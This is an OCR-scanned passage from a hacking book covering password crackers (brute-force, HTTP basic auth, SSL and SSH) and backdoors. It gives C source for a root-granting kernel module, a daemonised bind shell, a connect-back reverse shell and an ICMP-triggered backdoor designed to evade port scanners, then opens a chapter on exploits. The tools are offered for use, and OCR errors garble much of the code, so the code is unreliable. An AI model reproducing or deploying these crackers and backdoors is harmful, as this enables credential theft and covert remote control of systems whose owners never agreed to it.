gram, it has no bells and whistles and simply outputs passwords in an endless loop. 


a ee a 
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Listing 10.2. The brute-force password cracker (brutesymbol.c) 
finclude <stdio.h> 


int main{) 
1 


while ({++pswd[p]) > '~'} 
{ 
pPswaip) = ° °3 
ptrr 
if (!pswd[p) ) 
{ 
pswd(p) = " '; 
pswd(p + 1] = 0; 
i 
i 
p = O; 
printf("¢s\n", &pswd[0]); 


} 


return 0; 





10.2. Remote Password Crackers 


Remote password crackers are used for guessing passwords for remote services, such as telnet, 
FTP, SSH, and POP3, as well as for Web server resources over HTTP/HTTPS. The general 
operation procedure of any remote password cracker consists of three steps: 

|. Aconnection with a remote host is established. 

2. An authentication request is sent to a remote service according to the rules of the 
given service. 

The answer from the remote service is examined; if it says that the authentication was 
successful, the correct password was guessed. 


a | 


Web servers employ numerous authentication methods, such as the following: 


Basic authentication 
1 NT LAN Manager (NTLM) authentication 
O Authentication using an HTML form 
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I first show how to construct a remote password cracker for Web resources protected with 
basic authentication, and then modify this program to support secure sockets layer (SSL) pro- 
tocols. Next, I consider another password cracker, this one for SSH service logins and pass- 
words. You can use these programs as examples to devise password crackers for other services 
on your own. You will just have to obtain the necessary RFC and implement the authentica- 
tion method it describes in your password cracker. 


10.2.1. Basic HTTP Authentication 


In basic authentication, when a user tries to connect to a protected resource, the browser out- 
puts a window, in which the user must enter the login and password (Fig. 10.1). The authenti- 
cation window may look different on different systems. 











Fig. 10.1. The basic authentication i dlaiog window 


Consider the typical exchange processes taking place between a client and the server using 
basic authentication on the HTTP level. For example, suppose that the /admin/ resource on 
Web server 192.168.10.1 is protected by basic authentication. Access it in the regular way: 

GET /admin/ HTTP/1.1 

Host:192.168.10.1 

This produces the following lines in the header of the Web server's reply: 

HTTP/1.1 401 Authorization Required 

WWW-Authenticate: Basic realm="Administrator access only!" 

That is, the Web server indicates that authentication is required to access the given re- 
source. When the Web browser receives this reply, it outputs a window to enter the login and 
password. The user enters the login and password into the appropriate fields and clicks the OK 
button; the browser sends the following request: 

GET /admin/ HTTP/1.1 


Host: 152.168.10.1 
Authorization: Basic c2tseWFyb22mom1l2Yw4= 
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As you can see, the regular request simply has the Authorization line added to it. When 
the Web server receives this request, it issues a message that the entered login or password is in- 
valid and denies access to the resource or, if the login and password are correct, it grants access to 
the resource. When basic authentication is employed, logins and passwords are sent encrypted 
using the Base64 algorithm in the login:password format. The c2tseWFyb2ZmOm12YW4= 
string in the preceding sample request is the Base64-encoded sklyaroff: ivan string. 

The login and password are automatically encoded by the browser before it sends them to 
the Web server. Thus, your password cracker must encode each login: password pair with the 
Base64 algorithm. Unfortunately, the C language does not have a standard function to handle 
this task, so a custom function, named baseé4encode (), is used (Listing 10.3). 

The program used two files to form the login: password pair: The users.txt file contains 
logins and the word.txt file holds potential passwords. Both of these files can be found in the 
/PART II/Chapter 10 directory on the accompanying CD-ROM. 





Listing 10.3. A basic authentication password cracker (brutebase64.c) 


finclude <stdio.h> 
#finclude <sys/types.h> 
#finclude <sys/socket.h> 
finclude <netinet/in.h> 
#include <netdb.h> 
#include <string.h> 


#define USER “users.txt" 
#define PASS “words.txt" 
fidefine CATALOG "/admin/" 


Static char table64[]= 
"RECDEPGHI JELMNOPORSTUVWXYZabcde fghi j kLmnopqrstuvwxy201234567894+/"; 


char *port host; 
char *name; 


void token(char *arg) 

i 
name = strtok(arg, ":"); 
port_host = strtok(NULL, ""); 


if (port host == NULL) 
port host = "380"; 
} 


void base64Encode (char *intext, char *output) 
{ 

unsigned char ibuf[3]; 

unsigned char obuf[4]; 

unt i; 

int inputparts; 


while (*intext) { 


) 
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for (1 = inputparts = 0; 1 < 3; i++) { 
if({*intext) { 
inputparts++; 
ibuf[i] = *intext; 
intext++; 
} 
else 
ibuf[ij = 0; 
I 


obuf [0] = (ibuf [0] & OxFC) => 2; 

ebuf [1] ((ibuf [0] & 0x03) << 4) | ((ibuf [1) & OxFO) 
ebuf [2] ({ibut {1) & OxOF) << 2) | ((ibuf [2] & OxC0) 
obuf [3] = ibuf [2] & Ox3F; 


switch(inputparts) { 
case 1: /* Only 1 byte read */ 
sprintf(output, "tctc==", 
tableé4[obuf[0)], 
tablee4[obuf[1)]): 
break; 
ease 2: /* 2 bytes read */ 
Ssprintfloutput, "sctctc=", 
table64[obuf[0]], 
tableé4[obuf[1]], 
table64[obuf[(2)]); 
break; 
default: 
sprintf (output, "tcictctc", 
tableé4[obuf[0)]], 
tableé4[obuf[1]}], 
tables4[obuf[2)], 
tableé4[obuf[3]] ); 
break; 
output += 4; 
} 
*output=0; 


int main(int argc, char **argv) 


{ 


FILE: *fdi, *fd2; 

int sd, bytes; 

char bufl[250), buf2[250); 
char buft[250]; 

char strl[270], str2[100); 
struct hostent* host; 

struct sockaddr _in servaddr; 
char rez[2000]; 

char c{600); 


if (argc < 2 || argc > 3) { 


>> 4); 
>> 6); 
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fprintf(stderr, "Usage: ts host[:port] [proxy] [:port]\n\n", argv[0]); 
exit (<1); 
I 


if (argc == 3) 
tokenl(argyv([2]); 
else 
token (argv[1]); 


if ( (host = gethostbyname(name)}) == NULL) { 
herror("gethostbyname() failed”); 
exit(-1); 


} 


bzero(&servaddr, sizeof (servaddr) }; 

servaddr.sin family = AF_INET; 

servaddr.sin port = htons(atoi(port host)); 
servaddr.sin_addr = *((struct in_addr *)host->h_addr); 


4f ( (fdi = topen(USER,. ™r")) == NULL) { 
perror("fopen() failed"); 
exit{-1); 


i 


while(fgets{bufl, 250, fdl) !'= NULL) 
{ 
bufl{strespn(bufl, "\r\n\t")] = 0; 


if (strlen(bufl) == 0) continue; 

if( (fd2 = fopen({PAss, "r")) == NULL) { 
perror("fopen{}) failed"); 
exit(-1); 

} 


while(fgets(buf2, 250, fd2) != NULL) 
{ 
buf2z[strcespn(buf2Z, “\r\n\t")}] = 0; 
if ({strlen(buf2) == 0) continue; 


sprintfi(c, "ts:%s", bufl, buf2); 
baseb4Encode(c, rez); 


if ( (sd = socket (PF_INET, SOCK_STREAM, 0)) < 0) { 
perror ("socket () failed”); 


exit(-1); 

} 

if (connect(sd, (struct sockaddr *)4&servaddr, sizeof(servaddr)) == -1) { 
perror("connect() failed"); 

exit(-1); 


if (argc = 2) 
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sprintf(strl, “GET #s HTTP/1.1\r\n", CATALOG); 
else 
sprintf(strl, "GET http://8s%s HTTP/1.1\r\n", argv[{1), CATALOG); 


sprintf(str2, "Host:ts\r\nAuthorization: Basic ts\r\n\r\n", argv[1], rez); 


send(sd, strl, strlen(strl), 0); 
send(sd, str2, strlen(str2), 0); 


bzero(buf, 250); 


bytes = recvisd, buf, sizeof{but) - 1, QO); 
buf (bytes) = 0; 
if (strstr(buf, "200 OK") != NULL) { 
printi("ts", strl); 
printf ("tes\n", str2); 
printf("Result OR: #s\n", 
printf ( et 


} 


close(sd); 


return 0; 





10.2.2. An $$L Password Cracker 


The SSL protocol is used to create a secure connection between a client and the server. This 
protocol is often used to encrypt HTTP, resulting in secure HTTP (HTTPS). HTTPS service is 
usually provided on TCP port 443. There are several SSL protocol versions, as well as those of 
similar protocols, such as the transport layer security (TLS) protocol defined in RFC 2246, 
At the time the material for this book was being prepared, there were three SSL protocol ver- 
sions available: SSLv1, SSLv2, and SSLv3. SSLv1 is rarely used because of its security flaws. 
The password cracker I| offer for your consideration works only with SSLv2, but the differ- 
ences in programming for different SSL versions are minor. The source code for the program 
for cracking HTTPS logins and passwords, named brute_ssl.c, can be found on the accompa- 
nying CD-ROM. Basic HTTP authentication is used in the program. This is the same program 
as shown in Listing 10.3 but with SSL support. The program uses the OpenSSL library; there- 
fore, you must have this library installed on your computer. You can obtain this library at 
http://www.openssl.org; also, any full-featured Linux distribution includes it. Installing the 
library is a straightforward process, so I don’t describe it here. 
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A program with SSL support must include the /openssl/ssl.h header file; it is compiled 
using the -1ss1 flag: 

# qcc brute ssl.c -o brute ssl -lssl 

To write an SSL client, all you have to do is to use OpenSSL functions in the program. 
The first step is to initiate the OpenSSL library: 


SSL METHOD *method; 
SSL CIX *ctx; 


SSL *s31; 
OpenSSL add all algorithms(); /* Loading all encryption algorithms */ 
SSL load error strings(); /* Loading and registering error message 


tables */ 


method = SSLv2 client method(); /* Creating a client method */ 
etx = SSL_CTX_new (method) ; /* Creating a context */ 


Then a regular socket is created and a regular connection to the server established: 


if { (sd = socket (PF_INET, SOCK STREAM, 0)) < 0) { 
perror("socket() failed"); 
exit(-1); 


1f (commect(sd, (struct sockaddr *)aservaddr, sizeof(servaddr)) == -1) { 
perror ("connect () falled"); 
exit(-1); 


After a regular connection is established, an SSL connection is created and linked to the 
regular connection: 


ssl = SSL_new(ctx); /* Creating an SSL connection */ 
SSL _set_fd(ssl, sd); /* Linking the socket descriptor */ 
if {( SSL _connect(ssl) == -1 ) /* Establishing a connection */ 


ERR print_errors fp(stderr); /* Outputting error messages into the 
stderr stream */ 
When an SSL connection is created, data can be exchanged calling the SSL _write() and 
SSL read() functions, which is similar to calling the recv() and send() functions: 
int bytes; 
bytes = SSL write(ssl, strl, strlen(strl)); /* Encrypting, sending */ 
bytes = SSL readi(ssl, buf, sizeof(buf)-1); /* Receiving, decrypting */ 


10.2.3. An SSH Password Cracker 


The SSH protocol is a secure replacement to such protocols as telnet and rlogin. SSH provides 
good protection against eavesdropping on the connection between a client and the server, but 
it offers no protection against password cracking. The source code for a program for cracking 
SSH server logins and passwords, named brute_ssh.c, can be found on the accompanying 
CD-ROM. You will need the libssh library installed on your computer to compile this program. 
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This library can be obtained at http://OxbadcO0de.be/libssh/libssh-0.11.tgz. It is installed by 
executing the following command sequence: 


# tar zxf libssh-0.11.tgz 
# cd libssh-0.11 

# ./configure 

# Make 

# Make install 


After the installation, copy the program’s main module to the /usr/lib directory; other- 
wise, the compiled program will refuse to work. To do this, execute the following command: 

# cp /usr/local/lib/libssh.so /usr/lib/ 

A program with SSH support must include the /libssh/libssh.h header file; it is compiled 
using the -l1ss1 flag: 


# gcc brute _ssh2.c -o brute ssh2 -lssh 


The program only works with SSHv2 because SSHv1 has serious security flaws and is 
rarely used. At the time the material for this book was being prepared, SSHv2 was the high- 
est version. 

To write an SSH client, all you have to do is to use functions from the libssh library 
in the program. All functions are described in the API.html file, which is included in the 
library archive. 

First, options must be installed: 


char login[250], pass[250]; 

SSH_ SESSION *ssh_session; 

SSH OPTIONS *ssh_ opt; 

/* Initializing a new pointer to the options */ 

ssh opt = options new(); 

/* For later use, the server name must be converted from the numérical 
format to the view format: a.b.c.d */ 

but = malloc(20); 

inet_ntop(AF_INET, eservaddr.sin_addr, buf, 20}; 

/* The stream from the client to the server need not to be compressed */ 

options set_wanted method(ssh opt, KEX_COMP C 5, “none"); 

/* The stream from the server to the client need not to be compressed */ 

options set_wanted method(ssh_opt, KEX_COMP S$ C, “none"); 

/* Setting the server port (standard port 22) */ 

options set_port(ssh_opt, PORT); 

/* Setting the server name */ 

options set_host(ssh_opt, buf); 

/* Setting the login */ 

options set_username(ssh_opt, login); 


Next, a connection with the SSH server is established: 


if ((ssh_session = ssh_connect(ssh_opt)}) == NULL) { 
fprintf(stderr, "Connection failed: ts\n", ssh_get_error(ssh_session)}; 
exit (-1); 
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If the connection is established successfully, authentication is performed. After successful 
authentication, the function returns SSH_AUTH_ SUCCESS (previous versions of the libssh library 
use constants without the SSH_ prefix, 1.e., simply AUTH SUCCESS): 

if (ssh _userauth password(ssh session, login, pass) == SSH AUTH SUCCESS) { 

fprintfistderr, "OK! login: %s, password: %s\n", login, pass); 

Thus, the password cracker calls the function in assh_userauth password() loop and in 
each loop iteration specifies a new login and password, which are taken from the users.txt and 
words. txt files. 

Note that the program does not have to create a standard socket and connect to the server 
using the connect () function. The socket address structure (struct sockaddr_in) is, never- 
theless, filled to obtain the server’s IP address in the network format, which is then converted 
to the a.b.c.d view format. 

The source codes for all programs in this section can be found in /PART II/Chapter 10 
directory on the accompanying CD-ROM. 


10.2.4. Cracking HTML Form Authentication 


Unlike most authentication methods, authentication employing an HTML form does not use 
a standardized protocol, such as HTTP or HTTPS. Therefore, there is no standard way of im- 
plementing this authentication method. This circumstance may make the task of creating 
a password cracker for HTML form authentication to seem difficult. Because this is the most 
common authentication method used on the Internet, it deserves separate attention. I do not 
give a detailed recipe for implementing a password cracker for this authentication method; 
I just describe how to do this. 

The HTML form authentication is based on a form created using the <FoRM> and <INPUT> 
HTML tags. The exact details of the process can be found in any HTML textbook, The 
<INPUT> tag creates input fields for entering the login and password. After the user enters 
these data into the fields on the form, they are sent by the GET or Post method to the server 
using HTTP or HTTPS. There, the data are processed by a script written in Perl, PHP, Python, 
or some other Web language. Based on the results produces by the script, the remote user is 
either allowed access to the protected resource or, if an invalid login or password was supplied, 
denied it. 

Thus, a password cracker must form a proper request to the script on the server and send 
it using the GET or POST method, with a new login a password supplied for each request. 
Because there can be multiple combinations of the form’s field names, data sending methods 
used (GET or POST), and script names, either the user must pass these data to the password 
cracker or the utility must be able to analyze the form page and determine all necessary 
parameters by itself. (The latter approach is taken by the most powerful password crackers.) 
The following is an example of a typical GET request: 

GET /cgi-bin/login.cgi?user=ivanépass=sklyaroff HTTP/1.1 

Host:192.168.10.1 
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In this example, the form has two fields: user and pass. The login and password are 
checked using the /cgi-bin/login.cgi server script, which is passed ivan as a login and 
sklyaroff as a password. 

The main difficulty, however, is establishing when the correct login and password are 
found. In either case, regardless of whether the authentication is successful or not, the server 
usually replies with an HTML page. This means that the password cracker cannot determine 
success by analyzing fields in the HTTP header, because in both cases it will contain 200 OK. 
Thus, the only reliable way of determining successful authentication is to specify a word or 
a phrase that the successful authentication HTML reply page is expected to contain and 
a word or a phrase for the unsuccessful authentication HTML reply page. In this way, the 
password cracker can analyze the returned page and, by the absence or presence of the prede- 
fined word or phrase, can determine whether the authentication was successful. This approach 
is taken in most password cracking programs for HTML form authentication. 






Chapter 11: Trojans 
and Backdoors 





Trojans and backdoors are practically the same type of hacker tools, used to create a secret 
doorway to a system. The Trojan name is used when a backdoor utility is camouflaged as an 
innocent program, by analogy with the epical Trojan horse. Users running such a seemingly 
harmless program let an enemy into their system themselves. From now on, only the backdoor 
term will be used to denote both types of this software. 

All backdoors can be divided into two types: local and remote. A local backdoor grants 
privileges of some sort on a local machine. A remote backdoor allows access to the command 
interpreter on a remote machine. 

Sometimes a backdoor program can be created by simply modifying a legitimate program 
slightly. For example, such services as telnet, SSH, and rlogin can be compiled with constant 
magic passwords added. Other programs, daemons, and even libraries can be similarly 
changed. Backdoors of this type are not considered in this book because they are quite primi- 
tive and implementing them requires only basic programming skills. 


11.1. Local Backdoors 


Listing 11.1 shows the source code for a simple local backdoor, which is a loadable kernel 
module (LKM) for the version 2.4.x Linux kernels. (Kernel module programming is consid- 
ered in Chapter 18.) This backdoor intercepts system calls to automatically grant system 
administrator privileges to the user uid = 31337 (uid = Oandgid = 0). 
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Listing 11.1. A local LKM backdoor (bdmod.c) 





/* Module backdoor for Linux 2.4.x */ 
#define KERNEL _ 

#define MODULE 

#include <linux/config.h> 

#include <linux/module.h> 

#include <linux/version.h> 

#include <sys/syscall.h> 

f#include <Linux/sched.h> 

#include <linux/types.h> 


/* Exporting the system calls table */ 

extern void *sys_ call table[]; 

/* Defining a pointer for saving the original call */ 
int (*orlg setuid) (uid_t); 


/* Creating a custom function for the system call */ 
int change setuid(uid_t uid) 
{ 
if (uid == 31337) 
{ 
current->uid = 0; // Actual user ID 
current->euid = 0; // Active user ID 
current->gid = 0; // Actual group ID 
current->egid = 0; // Active group ID 
return 0; 
I 
/* If UID <> 31337, return the original UID. */ 
return (*orig setuid) (uid); 


int init_module (void) 
{ 
/* Saving the pointer to the original call */ 
orig setuid = sys call table[ NR setuid32); 
/* Replacing the pointer in the system calls table */ 
sys_call _table[_ NR_setuid32) = change setuid; 
return @; 


void cleanup module (void) 

{ 
/* Restoring the original system call pointer */ 
sys call _table[_ NR_setuid32) = orig_setuid; 

} 
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11.2. Remote Backdoors 


Based on their operating principle, remote backdoors are divided into two types: bind shell 
and connect back. A bind shell backdoor simply opens access to a command shell through 
a certain port and listens for the hacker to connect. A connect back backdoor does not listen for 
a connection but tries itself to connect to the client through a certain port. The reason for con- 
nect back backdoors is that firewalls often block incoming connections to nonstandard ports; 
because bind shell backdoors usually use nonstandard ports, access to such a backdoor may be 
blocked by the firewall. Connect back backdoors get around firewalls because they use outgoing 
connections, which are seldom blocked by firewalls. 

| consider both types of backdoors, as well as another type of a remote backdoor, called 
a wakeup backdoor. 


11.2.1. Bind Shell 


The source code for a bind shell backdoor is shown in Listing 11.2 later in this section, As you 
can see, this backdoor is a simple server application, When the backdoor is started, the port 
for the backdoor to listen on can be specified in a command argument. By default, the back- 
door opens port 31337. The port is bound to a TCP stream socket by filling a socket address 
structure and calling the bind() function. The listen() function places the socket in a state, 
in which it is listening for an incoming connection. The server process is blocked when the 
accept () function is called and waits for the client to connect. When a connection is estab- 
lished, the accept () function returns the connected cli descriptor. Then dup2() is called 
three times to bind the stdin(0), stdout (1), and stderr (2) standard streams to the cli de- 
scriptor, and a shell is opened by making a call to the exec1 () function. 

You may have never dealt with the daemon () function before, which is called at the begin- 
ning of the backdoor code. It disconnects the program from the manager console and runs it 
as a system daemon. This function spawns a new process. If fork() terminates successfully, 
the parent process calls exit (0) to have only the child process react to any further errors. If 
the first argument of the daemon () function is a nonzero argument, it makes the root (/) di- 
rectory current. If the second argument of the daemon () function is a nonzero argument, the 
function redirects the standard input/output error stream to /dev/null. The complete informa- 
tion can be found in man daemon. 

The created backdoor can be tested on the local machine: 

# gcc bindshell.c -o bindshell 

# ./bindshell 10000 

Now, you can connect to the backdoor using a telnet client or the netcat utility: 


# telnet 127.0.0.1 10000 
Trying 127.0.0.1... 
Connected to 127.0.0.1. 
Escape character is ‘*]'. 
ils -1; 

tetal 32 
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-(wX---=--- 1 root root 1325 Jul 24 05:45 bd icmp.c 
-Iwkr-xXIr-x 1 root root l4762 Jul 24 07:06 bindshell 
-IWk=<<<<= 1 root root 677 Jul 24 04:27 bindshell.c 
“e--— 1 root root 678 Jul 24 04:31 conback.c 
“ENR? Se 1 root root 23899 Jul 24 05:41 iempsend.c 


: command not found 


If a telnet client is used, each entered command must terminate with a semicolon. 





Listing 11.2. A bind shell backdoor (bindshell.c) 





#include <stdio.h> 
f#finclude <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
finclude <unistd.h> 


int main(int argc, char *argv[]) 
{ 
int sd, cli, port; 
struct sockaddr in servaddr; 
port = slast; 


daemon(1, OQ); 
af fargo '= 1) port = atoi(argv[1]); 


servaddr.sin family = AF INET; 
servaddr.sin addr.s addr = INADDR ANY; 
servaddr.sin port = htons(port); 


sd = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP); 
if (bind(sd, (struct sockaddr *)4servaddr, sizeof(servaddr) )) 
perror("bind() failed"); 


listen(sd, 1); 

cli = accept(sd, NULL, 0); 
dup2(cli, O}; 

dup2{cli, 1): 

dup2{eli, 2); 
execl("/bin/sh", "sh", NULL); 





11.2.2. Connect Back 


The source code for this backdoor is shown in Listing 11.3. This backdoor is a regular client 
that uses the connect () function to connect to the IP address and port, specified in the com- 
mand line. 

The client must listen for the backdoor to connect; that is, it works as a server. Other- 
wise, the backdoor will not be able to make a connection. The netcat utility is switched 
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into the listening mode by running it with the -1 (the listen mode) and -p (the port num- 
ber) options: 

# ne -l -p 5555 
_ The preceding command makes the netcat utility listen on port 5555. The created 
backdoor can be tested on the local machine by starting it in another terminal window as 
follows: 

# conback 127.0.0.1 5555 

The backdoor will connect to port 555, which will allow the netcat utility started earlier 
to execute commands: 


total 32 

-Irwi------ 1 root root 1325 Jul 24 05:45 bd icmp.c 
—~YwWkKI-XKI-xX lL root root 14762 Jul 24 07:06 bindshell 
=(Wk==---= I root root 677 Jul 24 04:27 bindshell.c 
“Sit =S<== 1 root root 678 Jul 24 04:31 conback.c 
-fwx------ 1 root root 2389 Jul 24 05:41 icmpsend.c 





Listing 11.3. The connect back backdoor (conback.c) 





#include <stdio.h> 
finclude <stdlib.h> 
finclude <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <unistd.h> 


int main(int argc, char *argv[]) 
( 

int sd; 

struct sockaddr in serv_addr; 


if (argc != 3) { 
printf ("Usage: ts <ip> <port>\n", argv[0]); 
exit(-1); 

} 


daemon({1, 0); 

serv_addr.sin_family = AF_INET; 

serv addr.sin _addr.s addr = inet addr(argv[1]); 

serv_addr.sin_port = htons({atoi(argv[2))); 

sd = socket (PF INET, SOCK STREAM, 0); 

if (connect (sd, (struct sockaddr*)éserv_addr, sizeoft(serv_addr)) < 0) 
perror("connect() failed"); 

dup2 (sd, 0); 

dup2 (sd, 1); 

dup2(sd, 2); 

execl("/bin/sh", "sh", 0); 


=e 
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11.2.3. Wakeup Backdoor 


The wakeup backdoor is not detected by the netstat utility or port scanners. It is possible 
because ICMP does not use network ports and any ICMP messages are handled by the IP sub- 
system. After a wakeup backdoor is started, it creates an ICMP raw socket and waits for a spe- 
cial ICMP packet, called the wakeup packet, without opening a port. When it receives the 
wakeup packet, the backdoor creates a regular TCP or UDP socket and listens on the port 
specified in the wakeup packet for incoming messages. After the messages are received and the 
session is closed, the port is closed and the backdoor again becomes invisible to port scanners 
and the netstat utility. Because a wakeup backdoor creates a raw socket, unlike regular back- 
doors it needs root privileges to run. 

In essence, a wakeup backdoor is a bind shell or a connect back backdoor with a special 
wakeup mechanism added to it. Thus, I only consider the bind shell wakeup backdoor 
(Listing 11.4), which you can easily modify to be a connect back backdoor. 

To send the wakeup packet, the icmpsend utility is used (Listing 11.5). For waking up, some 
wakeup backdoors use the ping utility run with the -p option, which allows data to be sent. 

You can find source codes for numerous wakeup backdoors at 
http://m00.blackhat.ru/m00-archive.tar.bz2. 

Consider the backdoor program in Listing 11.4. To receive the wakeup ICMP packet, the 
program uses the malloc () function, preparing a heap buffer the size of the sum of the IP and 
ICMP headers. 

Then an endless loop 1s started, in which a raw socket for receiving ICMP packets is cre- 
ated. Packets are received in the nested loop using the recv() function until the value of 
the Identifier field (icmp.icmp id) becomes 0xABCD. Basically, this value is what wakes 
the backdoor up. You can choose another value for this. As soon as a packet with this value 
arrives, the nested loop is terminated using the fork() function and a child process 
is spawned. The actions carried out in the child process are analogous to those considered 
in Section 11.2.1, the only difference being that the port number is taken from the 
Sequence Number field (icmp.icmp seq) of the received ICMP packet. The child process 
closes the ICMP raw socket, and the waitpid() function is called to properly terminate the 
child process and avoid creating zombie processes. 


Listing 11.4. The wakeup backdoor (bd_icmp.c) 


#Hinclude <stdio.h> 

finclude <stdlib.h> 

Finclude <sys/types.h> 
finclude <sys/socket.h> 
finclude <netinet/ip.h> 
Finclude <netinet/ip icmp.h> 
finclude <unistd.h> 

Finclude <signal.h> 


int main(int argc, char *argv[]) 
i 
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Struct ipacket [{ 
struct iphdr ip; 
struct icmp icmp; 

} *packet; 


int isock, sd, cli: 
int pid: 
struct sockaddr_in servaddr; 


daemon(0, O}; 

Packet = (struct ipacket *} malloc(sizeof(struct iphdr) + 
sizeof (struct icmp) }; 

Signal (SIGCHLD, SIG IGN); 


while (1) { 

if ( (isock = socket (PF INET, SOCK RAW, IPPROTO ICMP)) < 0) { 
perror("isock socket() failed"); 
@xit(-1}; 

} 

while (packet->icmp.icmp id != OxABCD) { 
recv(isock, packet, sizeof(struct ipacket), 0); 

i 

if (pid = fork({)) { 
close (isock); 
waltpid(pid, NULL, NULL); 

} else { 
servaddr.sin family = AF INET; 
servaddr.sin_addr.s_addr = INADDR_ANY; 
servaddr.sin_port = htons (packet->lcmp.icmp seq); 
sd = socket (PF INET, SOCK_STREAM, IPPROTO TCP); 
if (bind(sd, (struct sockaddr *)&seryvaddr, sizeof (servaddr) )) 

perror("bind() failed"); 

listen(sd, 1); 
cli = acceptisd, NULL, 0); 
dup2z(cli, 0}; 
dupzi(cli, 1); 
dup2(cli, 2); 
execl("/bin/sh", "sh", NULL); 





The icmpsend utility (Listing 11.5) is a simple utility for sending ICMP packets. Several 
such utilities were considered in the previous chapters, for example, in Section 6.1.1; therefore, 
in this section, I will not go over it in detail. In the command line, the icmpsend utility needs 
to be passed the source and destination IP address and optional port number (which will be 
stored in the icmp seq field of the ICMP header) and the ICMP message type (see Table 3.1). 
If the port number is not specified in the command line, the default port, 31337, is used. If the 
ICMP message is not specified, message 0 — Echo Reply — is used by default. 
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The value of the Identifier field (icmp id) is set to 0xABCD. Any other value can be used, 
but don’t forget to modify the source code of the backdoor accordingly so that it will expect 
this value. 





Listing 11.5. The utility for sending wakeup packets (icmpsend.c) 





#include 
#include 
#include 
#include 
#include 
#include 


unsigned 


{ 


} 


<stdio.h> 
<stdlib.h> 
<sys/types.h> 
<sys/socket.h> 
<netinet/ip.h> 
<netinet/ip icmp.h> 


unsigned short result; 
unsigned int sum = 0; 


while (len > 1) { 
sum += *addr++; 
len -= 2; 

} 

if (len = 1) 


sum += *({unsigned char*) addr; 


sum = (sum >> 16) + {sum 4& OXFFFE); 
sum += (sum >> 16); 
result = ~sum; 


return result; 


int main(int argc, char *argv[]) 


int sd; 

const int on = 
int type, port; 
struct sockaddr in servaddr; 


1; 


short in_cksum(unsigned short *addr, int len) 


char sendbuf[sizeof(struct iphdr) + sizeof(struct ieamp)); 


struct iphdr *ip hdr = (struct iphdr *)sendbuf; 


struct icmp *Lomp hdr = (struct icmp *) (sendbuf + 
sizeof (struct iphdr)); 

port = 31337; 

type = 0; 

if ({argc < 3) || targe > 5)) { 


fprintf(stderr, 
"Usage: ts <srcip> <dstip> [port] [type] \n 
"port - default 31337\n" 
"type - default Echo Reply(0).\n", 
argv[0)); 
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exit (-1); 
} 


if (arge > 3) 

port = atoi(argv[3]); 
if {argc = 5) 

type = atoif(argv[4)); 


printf("Port: td, Type: td.\n", port, type); 


sd = socket (PF_INET, SOCK_RAW, IPPROTO_RAW); 
if (setsockopt({sd, IPPROTO_LIP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) 
{ 
perror("setsockopt()} failed"); 
exit(-1); 
I 


bzero(&servaddr, sizeof (servaddr) ); 
servaddr.sin family = AF_ INET; 
servaddr.sin addr.s addr = inet addr(argv[2]); 


ip hdr->ihl = 3 
ip hdr->version = 4; 
ip hdr->tos = 0; 


ip hdr->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmp) ); 


ip hdr->id = htons(getuid()); 

ip hdr->ttl =m 255; 

ip hdr->protocol = IPPROTO ICMP; 

ip hdr->saddr = inet _addr(argv[1]); 
ip hdr->daddr = inet_addr(argv[2]); 


ip hdr->check = 0; 
ip hdr->check = in_cksum((unsigned short *)ip hdr, sizeof(struct iphdr)); 


icmp hdr->icmp_ type = type; 

icmp_hdr->icmp_code = 0; 

lcmp_hdr->iemp id = OxABCD; 

icmp hdr->iemp seq = port; 

icmp hdr->icemp cksum = 0; 

icmp hdr->icemp cksum = in cksum((unsigned short *)icmp hdr, sizeof(struct icmp)); 


if (sendts(sd, 
sendbuf, 
sizeof (sendbuf), 
QO, 
{struct sockaddr *)é&servaddr, 
sizeof (servaddr)) < 0) { 
perror("sendto() failed"); 
@xit(-1); 
} 
printf ("Packet successfully sending.\n"); 
close (sd); 
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UDP backdoors are not considered in this chapter. Usually, such backdoors consist of a 
server part and a client part, because it is difficult to set up communications with a UDP 
backdoor without a client part. The issues of encrypting the traffic between the client and the 
server parts of a backdoor also are not considered. Encryption is employed to conceal the 
backdoor from sniffers and intrusion-detection systems and is usually implemented using 
simple algorithm like XOR, although algorithms that are more complex can be used: Blowfish, 
IDEA, xTEA, and the like. Encryption also requires that the backdoor have the client and the 
server parts. Sometimes, backdoors are fitted with an authentication feature so that only its 
master can use it. The aspect of implementing authentication in backdoors is not considered 
here, either. If you carefully read and understood all the presented material, you should have 
enough knowledge to implement all of these features by yourself. 

Techniques for concealing backdoors are considered in Chapter 21, where rootkit pro- 
gramming is discussed. 

The source codes for all programs in this section can be found in /PART II/Chapter 11 di- 
rectory on the accompanying CD-ROM. 
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Beyond any doubt, exploits are the most powerful and widely used hacker weapon. Hackers 
who can find vulnerabilities and write exploits for them belong to the hacker elite. These are 
not just high-flown words, because being able to program exploits requires deep knowledge of 
operating systems, C and assembler languages, and other computer technologies. Reaching the 
top takes time and effort, and you have to start somewhere and sometime. When you work 
toward the top of the hacker world is up to you, but when you decide you are ready, the material 
in this chapter will be a good starting point. 


12.1. Terms and Definitions 


An exploit is a program that takes advantage of a vulnerability in software to execute foreign, 
usually malicious, code. Often, shortened forms of the word are used in the hacker milieu, for 
example, sploit or xploit. 

All exploits are customary divided into two large classes: local exploits and remote ex- 
ploits, which differ substantially in how they are implemented. Local exploits are intended 
for exploiting errors on local machines, and remote exploits use networks to take advantage 
of errors on remote machines. 

This book considers the most commonly used and the most difficult type of local and 
remote exploits: shellcode exploits, which launch a command shell on the compromised system 
(as a rule, /bin/sh in Linux). In addition to launching a command shell, an exploit can per- 
form other actions; for example, it can modify the firewall rules. The core part of this type of 
exploit is shellcode, which is sometimes called an exploit payload. Shellcode is machine code 
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that is introduced into the memory of a vulnerable program and launches a system shell. 
However, not all exploits take advantage of a found vulnerability to launch a shell. For exam- 
ple, some exploits, called DoS exploits, use it to simply crash the attacked system. In essence, 
DoS exploits are utilities for carrying out DoS attacks, which were considered in Chapter 6. 

The specifics of programming exploits greatly depend on the programming language, 
in which the vulnerable program was written. Each programming language has its own spe- 
cific bugs. For example, Perl and PHP programs are prone to the so-called poison NULL byte 
bug, while C/C++ programs are not. There also are errors that affect many programming lan- 
guages, for example, the array indexing error. 

Because the exploits considered in this book are written in C, they take advantage of the 
errors inherent only to this language, such as stack, heap, or BSS buffer overflow errors or 
format string errors. However, sometimes it is possible to write an exploit, for example, in 
Perl, that will take advantage of errors in C programs. 

